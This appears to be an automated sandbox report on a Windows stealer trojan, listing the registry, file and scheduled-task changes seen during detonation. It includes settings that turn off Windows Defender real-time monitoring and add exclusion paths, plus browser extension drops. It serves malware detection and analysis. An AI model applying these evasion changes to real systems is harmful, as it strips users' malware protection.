Malware Analysis Report

2025-06-16 07:07

Sample ID 240602-bd2z5sdc81
Target 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
SHA256 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a
Tags
discovery evasion execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a

Threat Level: Known bad

The file 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-02 01:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-02 01:02

Reported

2024-06-02 01:05

Platform

win7-20240221-en

Max time kernel

135s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ZEkGlaTFWGUn\MVNneNA.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\fzhkqIFMOIlOb.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\AnjiESz.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\uIkTWbH.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E} C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E}\WpadDecisionReason = "1" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0085000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecisionTime = 60653cd588b4da01 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecision = "0" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
